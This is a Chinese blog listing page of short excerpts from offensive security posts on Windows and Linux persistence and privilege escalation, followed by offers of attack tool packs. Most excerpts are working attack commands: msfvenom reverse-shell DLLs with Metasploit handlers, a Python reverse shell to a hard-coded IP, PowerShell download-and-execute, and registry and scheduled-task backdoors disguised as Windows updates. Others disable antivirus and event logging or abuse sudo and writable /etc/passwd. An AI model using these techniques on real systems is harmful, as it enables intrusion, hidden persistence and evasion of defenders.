自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

qq_59468567的博客

  • 博客(206)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 WEB渗透权限维持篇-通过自定义.net垃圾回收机制进行DLL注入

低权限用户可指定.net应用程序使用自定义垃圾收集器(GC),一个自定义GC可以以COMPLUS_GCName此环境变量指定,只需将此环境变量指向到恶意DLL,自定义GC的DLL需要一个名为GC_VersionInfo的导出表。下面是个弹框DLL

2024-09-15 23:54:54 237

原创 WEB渗透权限维持篇-DSRM+注册表ACL后门

>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2允许DSRM账户远程访问https://github.com/HarmJ0y/DAMP效果:域内任何用户可读取域控hashsystem权限执行>psexec.exe -accepteula -s -i -d cmd.exe域控制器执行PS>Add-RemoteRegBackdoor -ComputerName

2024-09-15 23:53:10 344

原创 WEB渗透权限维持篇-通过控制面板加载项维持权限

#include #include "pch.h"//Cplappletextern "C" __declspec(dllexport) LONG Cplapplet( HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2){ MessageBoxA(NULL, "inject control panel.", "Control Panel", 0); return 1;

2024-09-13 23:31:00 344

原创 WEB渗透权限维持篇-进程注入

注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\下新建AppCertDlls,新建名字为Default,值为c:\1.dll的项#msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 –f dll >/root/1.dllMsf>use exploit/multi/handlerMsf>set payload windo

2024-09-13 23:27:49 302

原创 WEB渗透权限维持篇-关闭防病毒软件

https://mrd0x.com/cortex-xdr-analysis-and-bypass/卸载密码:Password1Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.dbLook for PasswordHash, PasswordSalt or password, salt strings.禁用Cortex:将DLL改成随机值,然后重启reg add HKE

2024-09-13 23:24:42 336

原创 WEB渗透权限维持篇-隐藏windows服务

Translate from: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/Windows的一个功能允许红队或攻击者将服务隐藏起来,从而为逃避基于主机的常见威胁搜寻技术的检测提供了机会。这里假设Fax服务是我们的恶意文件或后门打开services.msc可以看到服务

2024-09-11 21:58:14 324

原创 WEB渗透权限维持篇-映像劫持

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 新建DWORD值GlobalFlag 16进制为200创建:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe字符串值:MonitorProcess=mum

2024-09-11 21:55:03 308

原创 WEB渗透权限维持篇-DLL注入-进程挖空(MitreT1055.012)

第 2 步:交换其内存内容(取消映射/挖空):NtUnmapViewOfSection()可以使用以下方法完成:NtQueryProcessInformation + ReadProcessMemory此外,可以使用单个函数轻松完成:ReadRemotePEB(pProcessInfo->hProcess) PPEB pPEB = ReadRemotePEB(pProcessInfo->hProcess);从 PEB 的图像地址读取 NT Headers 格式(从 PE 结构)。这是必不可少的,

2024-09-10 12:20:10 279

原创 WEB渗透权限维持篇-禁用Windows事件日志

从上面的屏幕截图中,尚不清楚哪个进程真正托管了该服务,但是如果我们继续在Process Hacker中逐个检查进程,我们最终将找到托管该服务的进程,当前为pid 2196:EventLog svchost.exe

2024-09-10 12:19:16 220

原创 WEB渗透权限维持篇-MSSQL后门

http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1>powershell -ep bypass >IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp

2024-09-10 12:17:37 413

原创 WEB渗透权限维持篇-DLL注入-修改内存中的PE头

将修改新创建进程内存中的 PE 标头,以将我们自己的 DLL 添加到导入描述符列表中1 使用带有 CREATE_SUSPENDED 标志的 CreateProcess 创建目标 EXE 进程的挂起实例。2 计算目标EXE的基地址,使用NtQueryInformationProcess读取目标进程的PEB地址,使用ReadProcessMemory读取ImageBaseAddress字段值。3 使用 ReadProcessMemory 从目标进程读取主 PE 头(IMAGE_NT_HEADERS)

2024-09-09 18:12:24 301

原创 goby/xray批量导入自定义poc(附2024红队POC)

找到include_poc参数,修改为include_poc: [poc-xray/*]xray批量导入自定义POC(附2024最新xrayPOC)直接把poc解压到xray.exe同一目录下。然后修改config.yaml文件。然后启动xray看效果。在这个路径下解压poc。

2024-09-09 18:00:14 1918

原创 WEB渗透权限维持篇-计划任务

创建计划任务>schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM查看计划任务>schtasks /query | findstr "windowsupdate"立即执行某项计划任务>schtasks /run /tn "windowsupdate"删除某项计划任务>schtasks /delete /F

2024-09-08 14:53:23 163

原创 WEB渗透权限维持篇-CLR-Injection

计算机\HKEY_CURRENT_USER\Software\Classes\CLSID添加项{11111111-1111-1111-1111-111111111111}和它的子项InprocServer32 新建一个键ThreadingModel,键值为:Apartment,默认键值为dll路径 劫持explorer.exe。WMIC可替换为powershell。

2024-09-08 14:50:59 175

原创 WEB渗透权限维持篇-DLL注入\劫持

生成DLL>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll>use exploit/multi/handler>set payload windows/x64/meterpreter/reverse_tcp>Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient)

2024-09-08 14:47:24 313

原创 WEB渗透Linux提权篇-MYSQL漏洞提权

版本MariaDB < 5.5.52 < 10.1.18 < 10.0.28MySQL

2024-09-06 23:23:53 607

原创 WEB渗透Linux提权篇-SUID提权

$touch xxx$/usr/bin/find xxx –exec whoami \;$/usr/bin/find xxx –exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen

2024-09-06 23:22:17 266

原创 WEB渗透Linux提权篇-Sudo提权

>sudo -l 查看/home/user/.sudo_as_admin_successful>sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash">sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash>sudo strace –o /dev/null /bin/bash>sudo nmap –inter

2024-09-05 14:45:26 403

原创 WEB渗透Linux提权篇-通配符提权

存在一个定时压缩目录的任务 生成反向shell。即可返回shell 或使用sudoer。低权限登录 查看cron。

2024-09-05 14:40:08 311

原创 WEB渗透Linux提权篇-漏洞提权

检查执行命令所需时间>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1提前结束(多运行几次)>dbus-send --system --dest=org.freedes

2024-09-04 10:12:18 281

原创 WEB渗透Linux提权篇-查找辅助信息

>cat /etc/issue>cat /etc/*-release>cat /etc/lsb-release # Debian based>cat /etc/redhat-release # Redhat based>cat /proc/version>uname -a>uname -mrs>rpm -q kernel>dmesg | grep Linux>ls /boot | grep vmlinuz-

2024-09-04 09:56:35 308

原创 WEB渗透Linux提权篇-可写文件提权

$ls –lh /etc/passwd 若是任何用户可读写$perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bas

2024-09-04 09:50:51 565

原创 WEB渗透Linux提权篇-环境变量提权

编译>gcc demo.c -o shell>chmod u+s shell执行./shell 回显ps命令提权find / -perm -u=s -type f 2>/dev/null存在脚本/home/name/script/shell>cd /tmp>echo "/bin/bash" > ps>chmod 777 ps>echo $PATH>export PATH=/tmp:$PATH>cd /home/raj/script>./shell>whoami或使用copy命

2024-09-02 11:29:55 226

原创 WEB渗透Linux提权篇-提权工具合集

用于检查可执行文件属性的 bash 脚本(如 PIE、RELRO、PaX、Canaries、ASLR、Fortify Source)枚举基本系统信息并搜索常见的权限提升向量,例如世界可写文件、错误配置、明文密码和适用的漏洞利用。检查文件权限、cron 作业(如果可见)、弱凭据等。搞个web服务提供下载。

2024-09-02 11:26:22 2191

原创 WEB渗透Win提权篇-合集(下)

使用cmdkey列出机器上存储的凭据>cmdkey /listCurrently stored credentials: Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator可以使用runas的/savecred参数以使用保存的凭据。以下示例通过 SMB 共享调用远程可执行文件>runas /savecred /user:WORKGROUP\A

2024-09-01 11:28:18 467

原创 WEB渗透Win提权篇-合集(上)

Rogue Potatohttps://github.com/antonioCoco/RoguePotato要在远程机器上运行端口转发,必须使用端口 135 作为源端口socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999在远程计算机上运行 RogueOxidResolver.exe如果您有防火墙限制,请使用此选项RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"Rog

2024-09-01 11:26:05 534

原创 WEB渗透Win提权篇-PrintNightmare

https://github.com/cube0x0/CVE-2021-1675>python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'>python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'本地执行溢出>SharpPri

2024-08-30 22:49:49 726

原创 WEB渗透Win提权篇-Searchsploit

wmic qfe list full|findstr /i hotfixsysteminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440 KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i "%i"||

2024-08-30 22:48:49 683

原创 WEB渗透Win提权篇-白名单提权

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:y.exe /unsafe C:\Users\y\Desktop\1.csusing System;using System.Net;using System.Linq;using System.Net.Sockets;us

2024-08-29 10:59:37 202

原创 WEB渗透Win提权篇-CVE-2020-1472

使用 IP 地址代替FQDN 用 Windows API 来强制 NTLM 重置密码为Waza1234/Waza1234/Waza1234/从 secretsdump 恢复密码 将本地注册表机密转储到最新版本时,secretsdump 将自动转储明文机器密码(十六进制编码)激活一个虚拟环境来安装impacket。查找 DC 的旧 NT 哈希。执行dcsync导出hash。从一个没加入域的机器测试。执行,并且设置密码为空。

2024-08-29 10:51:01 222

原创 WEB渗透Win提权篇-MSF提权

发现补丁>use post/windows/gather/enum_patches列举可用EXP>use post/multi/recon/local_exploit_suggester

2024-08-28 15:48:22 224

原创 WEB渗透Win提权篇-特权文件写入提权

此技巧不再适用于最新版本的 Windows 10 Insider Preview如果我们在 Windows 或某些第三方软件中发现了一个特权文件写入漏洞,可以将我们自己的windowscoredeviceinfo.dll复制到C:\Windows\Sytem32\,然后由 USO 服务加载,以NT AUTHORITY\System执行任意代码构建https://github.com/itm4n/UsoDllLoader选择发布配置和 x64 架构。构建解决方案。DLL .\x64\Release\

2024-08-28 15:45:12 166

原创 WEB渗透Win提权篇-PowerUp

检测有漏洞的服务在AbuseFunction中会显示利用语句。重启电脑后会新增用户admin查找可能劫持的进程查找环境变量中当前用户可修改的目录查找存在注册表中自动登录用户的平局查询trusted_service_path查询当前用户可修改的注册表开机启动项查询当前用户可修改的计划任务项查询系统中所有web.config文件中的明文密码。

2024-08-27 19:47:45 204

原创 WEB渗透Win提权篇-BypassUAC

提权工具合集包(免费分享): 夸克网盘分享WEB渗透Win提权篇-RDP&Firewall-CSDN博客WEB渗透Win提权篇-MSSQL-CSDN博客WEB渗透Win提权篇-MYSQL-udf-CSDN博客WEB渗透Win提权篇-AccountSpoofing-CSDN博客WEB渗透Win提权篇-弱权限提权-CSDN博客 DccwBypassUACCMSTPBypass-UACDLL hijackSilentClean

2024-08-27 19:43:26 277

原创 WEB渗透Win提权篇-弱权限提权

提权工具合集包: 夸克网盘分享WEB渗透Win提权篇-提权工具合集-CSDN博客WEB渗透Win提权篇-RDP&Firewall-CSDN博客WEB渗透Win提权篇-MSSQL-CSDN博客WEB渗透Win提权篇-MYSQL-udf-CSDN博客WEB渗透Win提权篇-AccountSpoofing-CSDN博客条件:服务帐号upnphost如果由于缺少依赖项而失败,请尝试以下命令。使用accesschk弱注册表权限检查有KEY_ALL_ACCESS权限的注册表项查询路

2024-08-26 21:57:53 251

原创 WEB渗透Win提权篇-提权工具合集

要运⾏ PowerUp,请启动 PowerShell 会话并使⽤ dot 加载脚本,请执⾏以下操。winPEAS 是⼀个⾮常强⼤的⼯具,它不仅积极寻找特权升级错误配置,⽽且还在。当使⽤命令⾏时,我们有 使⽤仍具有 /accepteula 命令⾏的旧版本选项。缺点是:程序的最新版本会⽣成⼀个 GUI"接受 EULA" 弹出窗⼝。您可以使⽤它来检查⽤户或组是否有权访问⽂件,⽬录,服务和注册表项。accesschk 是⼀个很旧的⼯具了,但我们依然可以尝试去⽤。Seatbelt 是⼀种枚举⼯具。

2024-08-26 21:34:34 2661

原创 WEB渗透Win提权篇-AccountSpoofing

https://github.com/cube0x0/noPac>noPac.exe scan -domain htb.local -user user -pass 'password123'>noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt>noPac.exe -

2024-08-25 20:36:43 280

原创 WEB渗透Win提权篇-MYSQL-udf

Mysql>5.1 udf.dll放置在lib\plugin Mysql

2024-08-25 16:58:47 189

原创 WEB渗透Win提权篇-MSSQL

查询状态>select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 存在返回1EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;exec sp_configure 'xp_cmdshell',1;reconfigure;exec maste

2024-08-24 01:07:15 250

原创 WEB渗透Win提权篇-RDP&Firewall

放行出去到远程8888端口的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=out remoteport=8888 action=allow。放行远程8888端口进来的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=in remoteport=8888 action=allow。本机开启3389远程连接的方法。注: 修改连接端口重启后生效。

2024-08-24 01:05:52 505

网络安全之渗透测试20w字全套笔记
前50章目录: 收集信息 域名信息 CDN是否存在 Bypass CDN DNS历史记录 SSL证书信息 Whois信息 子域名检查 IP和端口信息 ASN 历史IP NMAP使用 工具 网站架构和指纹识别 其他信息 人员信息 初始访问 Web服务突破 前端 SQL注入 判断注入 数据库类型识别 MSSQL MYSQL Oracle PostgreSQL SQLite DB2 SQLMAP XSS CSRF PHP包含下载读取 XML SSRF DNSLOG Xpath注入 SSTI 命令注入 PHPMyAdmin利用 PHP-FPM之RCE PHPstudy后门 IIS写权限 绕过WAF 数据库 命令执行 CmdHijack Fuzz目录 web程序漏洞 编辑器漏洞 邮件地址payload 从LFI到RCE Web server日志分析命令 默认密码 wso2 未授权访问 Redis activemq docker elastic hadoop jboss jenkins memcache mongo zookeeper CouchDB Jenkins Solr VNC Webl

2024-08-25

蓝桥杯等程序设计竞赛专题挑战教程
《程序设计竞赛专题挑战教程》pdf电子书可在码农书籍网下载,这本书针对蓝桥杯软件类大赛,覆盖了数据结构和算法等关键知识点,并提供了详细的在线评测系统介绍和评分说明。书籍内容包括从基础到高级的各类知识点,如手算题、基础数据结构、基本算法等,并用真题进行细致讲解,适合备赛蓝桥杯或其他编程、算法类大赛 本资源为相应的代码资源。

2024-08-25

蓝桥杯LeeCode数据结构与算法资源
关于LeetCode数据结构与算法的学习资源,以下是一些推荐的资源,这些资源涵盖了从基础到高级的算法知识,包括在线教程、开源项目、视频课程等多种形式: LeetCode官方题库:LeetCode平台本身提供了大量的算法题目,是学习数据结构和算法的重要资源。 LeetCode Official 程序员充电站/LeetCode-Py:提供了详细的算法与数据结构基础讲解教程,包括850+道LeetCode题目的详细解析。 GitHub - itcharge/LeetCode-Py LeetCode 算法笔记:由DataWhale开源组织提供,适合希望通过理论与实践相结合的方式学习算法的人。 LeetCode 算法笔记 清华大佬LeetCode教程:B站上的视频教程,由清华大学学生讲解,包括解题思路、代码讲解和刷题笔记。 Bilibili - 清华大佬LeetCode教程 算法通关手册:一本算法与数据结构的电子书,适合希望通过系统学习掌握算法知

2024-08-25

全套免杀教程+免杀工具合集
远控免杀专题(1)-基础篇.pdf 远控免杀专题(2)-msfvenom隐藏的参数.pdf 远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf 元控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf 远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf 远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf 远控免杀专题(7)-Shellter免杀(VT免杀率7-69).pdf 元控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13-71).pdf 远控免杀专题(9)-Avet免杀(VT免杀率17-71).pdf 远控免杀专题(10)-TheFatRat免杀(VT免杀率22-70).pdf 元控免杀专题(11)-Avoidz免杀(VT免杀率23-71).pdf 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23-70).pdf 远控免杀专题(13)-zirikatu免杀(VT免杀率39-71).pdf 远控免杀专题(14)-AVlator免杀.pdf 等共74课+48个工具脚本

2024-08-25

CTF线下赛AWD脚本合集
资源概述: 本人在长城杯、蓝桥杯、巅峰极客等线下AWD攻防比赛所用到的全部工具(如WAF、EDR、文件监控脚本、文件还原脚本、混淆战局工具、流量监控工具、批量拿分脚本模板)和脚本以及教程及笔记还有练习平台和靶场源码,并取得了很多奖项,故在此分享这些资源,希望有需要的人能得到帮助。 目录: 文件变化实时监控工具 go文件监控 CTF-WAF AWD脚本 awd_attack_framework 批量拿分脚本 搅屎棍脚本 文件还原脚本 笔记x8 前期准备教程 不死马x6 AWD训练平台源码 AWD靶场合集 大型WAF源码 漏洞识别工具

2024-08-25

渗透测试常用poc、工具集合
本poc包含近100多个常用的poc,还有很多工具集。全是博主自己用的,现在免费分享,下面是列举的前10个poc: CVE-2019-0708-msf快速搭建 CVE-2019-10173 Xstream 1.4.10版本远程代码执行漏洞 CVE-2019-16131 OKLite v1.2.25任意文件上传漏洞 CVE-2019-16132 OKLite v1.2.25存在任意文件删除漏洞 CVE-2019-16309 FlameCMS 3.3.5后台登录处存在sql注入漏洞] CVE-2019-16313蜂网互联企业级路由器v4.31密码泄露漏洞 CVE-2019-16314 indexhibit cms v2.1.5存在重装并导致getshell CVE-2019-16759 vBulletin 5.x Oday pre-auth RCE exploit

2024-01-06

护网面试题总结+安全工程师笔试问题
博主的团队面试护网的时候遇到的所有问题,希望能帮助到每个护网梦的网安生。 护网行动」是以「公安部牵头」的,用以评估企事业单位的网络安全的活动。具体实践中,公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。 当前,我国网络安全形势严峻,「为了防止羊被偷,我们得在羊被偷之前就开始识别风险、加固羊圈建设」。护网行动就是在这样的背景下开展的。 护网行动每年举办一次,政府单位、事业单位、国企单位、名企单位等都必须参与! 「护网行动」是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越来越多的单位都加入到护网行动中,网络安全对抗演练越来越贴近实际情况,各机构对待网络安全需求也从被动构建,升级为业务保障刚需。

2024-01-06

网络安全零基础学习路线 v2024
一个实习过安服、渗透测试工程师的大学毕业生,挖过SRC中级,打过CTF获得过国奖,去过护网蓝中和红初,通过7家培训班+自生经验总结的2024最全最新的网络空间安全路线图,小白可以按这个路线入门,自学的小伙伴也可以靠这个查漏补缺,我也是自学出生到现在这个程度的,相信自己,多学多刷题,你也可以实现4k日薪梦。后续资料还在整理中,可以看看我分享的其他资料,免费公开,助力每一个红客梦

2024-01-06

SRC技术文档汇总100套(2024最新版)
本人自发整理了一个月,将2024以前的全部SRC技术资料全部系统性整理到一起,供技术学习使用,本人初学三个月已成功挖了一个CNTD中级漏洞,希望对大家有帮助。 安全应急响应中心(SRC, Security Response Center) ,是企业用于对外接收来自用户发现并报告的产品安全漏洞的站点。第三方报告平台。报告平台是指由独立的第三方公司成立的综合性的报告平台。国内补天平台、盒子平台、火线平台等均属于该模式。外部报告者注册对应漏洞报告平台,选择对应的厂商进行报送,接着该第三方机构会发送邮件提示相关厂商确认处理。 企业SRC。企业自己开发自己的安全应急响应中心,制定自己的漏洞收集以及奖金计划。目前国内已有近百家企业SRC平台,例如百度、阿里、腾讯、美团、滴滴等,均成立了自己的安全应急响应中心,对外收集并处理白帽子报送的报告。

2024-01-06

CISP、NISP二级、CISE题库最新版(2024年1月更新)
CISP、NISP二级、CISE是用的同一套试卷,本人自考NISP二级12月份场次已过,免费把自己备考刷的题库分享出来,考NISP二级在考前把这些题库刷两遍基本上就过了,我是一把过的,重点是认真刷题,考试的时候全部是原题

2024-01-06

NISP一级题库,NISP二级题库,国家信息安全水平测试,网络安全证书(2024)
个人在报考的NISP官网通过爬虫获取的全部题目,自用。需要的自取,2024年1月最新更新,NISP一级题库,复兴杯初赛题库。

2024-01-06

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除